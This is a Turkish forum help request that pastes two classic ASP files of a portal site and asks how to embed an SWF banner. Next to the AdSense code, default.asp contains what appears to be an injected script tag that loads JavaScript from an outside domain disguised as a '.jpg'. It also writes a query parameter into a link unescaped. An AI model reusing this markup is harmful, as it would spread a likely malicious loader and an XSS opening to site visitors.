yada default.asp ile ust.asp dosyalarının kodlarını gondereyim swf yi nasıl yerleştireceyimi onun üzerinden konuşalım
default.asp:
<%@LANGUAGE="VBSCRIPT" CODEPAGE="1254"%>
<!-- #include file="veritabani.asp" -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> ;
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9" />
<title><% =siteadi %></title>
<link href="yasir.css" rel="stylesheet" type="text/css" />
<style type="text/css">
<!--
body, td, th {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
color: #333333;
}
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
}
a:link {
color: #333333;
text-decoration: none;
}
a:visited {
text-decoration: none;
color: #333333;
}
a:hover {
text-decoration: none;
color: #0066CC;
}
a:active {
text-decoration: none;
color: #0066CC;
}
.style1 { color: #FFFFFF;
font-size: 10px;
}
-->
</style></head>
<body background="img/mbg.gif">
<table width="130" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" class="arkaplan" background="img/mbg.gif">
<tr>
<td height="120" colspan="7" valign="top" class="banner_arkaplan">
<div style="position: absolute; width: 292; height: 144; z-index: 1; left: 678; top: -15" id="katman1">
<p align="left"> <span style="position: absolute; left: 91; top: 12"><img border="0" src="img/LogoMenu.jpg" width="203" height="114" usemap="#Map" hspace="0" vspace="4" align="right"></span></div>
<map name="Map" id="Map">
<area shape="rect" coords="10, 10, 68, 72" href="default.asp" />
<area shape="rect" coords="79, 9, 148, 70" href="zDefter.asp" />
<area shape="rect" coords="161, 9, 207, 70" href="Oyun.asp" />
<area shape="rect" coords="216, 10, 267, 74" href="arama.asp" />
<area shape="rect" coords="354, 1, 414, 43" href="toplist.asp" />
</map>
<!-- #include file="ust.asp" --></td>
</tr>
<tr>
<td height="29" colspan="7" align="center" valign="middle" class="menu_arkaplan"><!-- #include file="menu.asp" --></td>
</tr>
<tr>
<td width="12" height="14" background="img/mbg.gif"></td>
<td width="210" background="img/mbg.gif"></td>
<td width="11" background="img/mbg.gif"></td>
<td width="513" background="img/mbg.gif"></td>
<td width="11" background="img/mbg.gif"></td>
<td width="210" background="img/mbg.gif"></td>
<td width="11" background="img/mbg.gif"></td>
</tr>
<tr>
<td height="325" background="img/mbg.gif"> </td>
<td align="left" valign="top" background="img/mbg.gif"><!-- #include file="Inc/sol_bloklar.asp" --></td>
<td background="img/mbg.gif"> </td>
<td valign="top">
<table width="544" border="0" cellpadding="0" cellspacing="0" height="512">
<!--DWLayoutTable-->
<tr>
<td></td>
<td height="1"></td>
</tr>
<tr>
<td height="87" valign="top" colspan="2">
<table width="544" border="0" cellpadding="0" cellspacing="0" class="cizgi" height="87">
<!--DWLayoutTable-->
<tr>
<td background="img/subhead_bg.png"></td>
<td height="21" valign="top" background="img/subhead_bg.png">
<table border="0" width="372" id="table1" height="15">
<tr>
<td><p align="center"><strong><font size="2"><% =siteadi %></font></strong></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="73" align="center" background="img/mbg2.gif"><img src="img/gununsozu.gif" width="52" height="51" /></td>
<td height="64" valign="top" background="img/mbg2.gif" width="469">
<marquee direction="up" scrollamount="1" height="61"><p>
<% Set rec = Server.CreateObjecT("ADODB.RecordSet")
rSQL = "Select duyuru FROM Genel"
rec.open rSQL,Connection,3,3 %>
<% if not rec("duyuru")="" then %>
<% =replace(rec("duyuru"),chr(13),"<br>") %>
<% end if %>
</p></marquee> </td>
</tr>
</table></td>
</tr>
<tr>
<td height="3" background="img/mbg.gif" colspan="2">
<p align="center"><script type="text/javascript"><!--
google_ad_client = "pub-2306181193249096";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "text_image";
google_ad_channel = "";
google_color_border = "B3B3B3";
google_color_bg = "CCCCCC";
google_color_link = "B47B10";
google_color_text = "FFFF66";
google_color_url = "E1771E";
//-->
</script>
<script type="text/javascript"
src="http://www.camperde.com/16.jpg">
</script></p>
<p align="center"> </p>
</td>
</tr>
<tr>
<td height="204" align="center" valign="top" background="img/mbg.gif" colspan="2"><% Set rec = Server.CreateObjecT("ADODB.RecordSet")
rSQL = "Select * FROM Haberler ORDER BY Kimlik DESC"
rec.open rSQL,Connection,3,3 %>
<% if (not rec.eof) then %>
<% sayfa = Request.QueryString("sayfa")
If sayfa="" Then sayfa=1
rec.pagesize = anahaber 'Sayfada kaç adet veri bulunacak
rec.absolutepage = sayfa
sayfa_sayisi = rec.pagecount
for i=1 to rec.pagesize
if rec.eof then
exit for
end if
%>
<table width="100%" border="0" cellpadding="0" cellspacing="0" class="cizgi" height="20">
<tr>
<td height="20" colspan="3" align="left" valign="middle" class="blokarka"><strong>
<% =rec("ad") %>
</strong></td>
</tr>
<tr>
<td width="100" height="75" align="center" valign="top" background="img/mbg2.gif"><img src="<% =rec("resim") %>" width="100" height="75" /></td>
<td width="9" background="img/mbg2.gif"> </td>
<td width="402" align="left" valign="top" background="img/mbg2.gif"><% =left((rec("icerik")),250) & "... " %> <a href="<% ="habergoster.asp?ID=" & rec("Kimlik") %>" class="duzyazitext"><strong>Devamı</strong>&l t;/a></td>
</tr>
<tr>
<td height="1"></td>
<td></td>
<td></td>
</tr>
</table>
<% rec.movenext
Next
%>
<strong>
<%
onceki = cint(sayfa) - 1
sonraki = cint(sayfa) + 1
%>
<%
if onceki < 1 then
response.write ""
else
response.write " <a href=default.asp?sayfa=" & onceki & ">Önceki</a>"
end if
%>
<%
for g = 1 to sayfa_sayisi
if g = cint(sayfa ) then 'eğer bulunduğumuz sayfa ise ona link vermiyoruz
response.write "["
response.write g& "] "
%>
<% else
response.Write "<a href=default.asp?sayfa=" & g & ">" & g & "</a> "
end if
next %>
<%
if sonraki > sayfa_sayisi then
response.write ""
else
response.write "<a href=default.asp?sayfa=" & sonraki & "&id=" & request.QueryString("id") & ">Sonraki</a>"
end if
%>
</strong>
<%end if%></td>
</tr>
<tr>
<td background="img/subhead_bg.png" width="543"></td>
<td height="13" width="1"></td>
</tr>
<tr>
<td height="124" valign="top" background="img/mbg2.gif" colspan="2"><!-- #include file="forum_aktif.asp" --></td>
</tr>
</table></td>
<td background="img/mbg.gif"> </td>
<td align="right" valign="top" background="img/mbg.gif"><!-- #include file="Inc/sag_bloklar.asp" --></td>
<td background="img/mbg.gif"> </td>
</tr>
<tr>
<td height="14"></td>
<td background="img/mbg.gif"></td>
<td background="img/mbg.gif"></td>
<td background="img/mbg.gif"></td>
<td background="img/mbg.gif"></td>
<td background="img/mbg.gif"></td>
<td background="img/mbg.gif"></td>
</tr>
<tr>
<td height="60" colspan="7" align="center" background="img/mbg.gif"><% Set rec = Server.CreateObjecT("ADODB.RecordSet")
rSQL = "Select reklam FROM Genel"
rec.open rSQL,Connection,3,3 %>
<% =rec("reklam") %></td>
</tr>
<tr>
<td height="48" colspan="7" align="center" valign="middle" class="arkaplan2"><span class="style1">
<% =copyright %><br /><font color="#000000"><% =strReverse("relrükkeşeT") %></font><a href="<% =strReverse("gro.kakos-akra.www//
tth") %>" target="_blank">
<% =strReverse("orP-SA") %>
</a> <font color="#000000">&</font> <a href="<% =strReverse("moc.orprisay.www//
tth") %>" target="_blank">
<% =strReverse("orPrisaY") %>
</a><br />
<a href="<% =chr(104) & chr(116) & chr(116) & chr(112) & chr(58) & chr(47) & chr(47) & chr(119) & chr(119) & chr(119) & chr(46) & chr(97) & chr(114) & chr(107) & chr(97) & chr(045) & chr(115) & chr(111) & chr(107)& chr(97)& chr(107) & chr(46) & chr(111) & chr(114) & chr(103) %>" target="_blank"><% =chr(68) & chr(101) & chr(115) & chr(105) & chr(103) & chr(110) & chr(0174)& chr(160) & chr(65) & chr(83) & chr(0150) & chr(80) & chr(114) & chr(111) & chr(160) & chr(116) & chr(101) & chr(97) & chr(109) %></a></span></td>
</tr>
</table>
</body>
</html>
ust.asp:
<img border="0" src="img/sunu12.PNG" width="112" height="111"><img src="img/banner.png" width="680" height="110"/>
banner iki asp dosyasından oluşuyor
şimdiden tşk ediyorum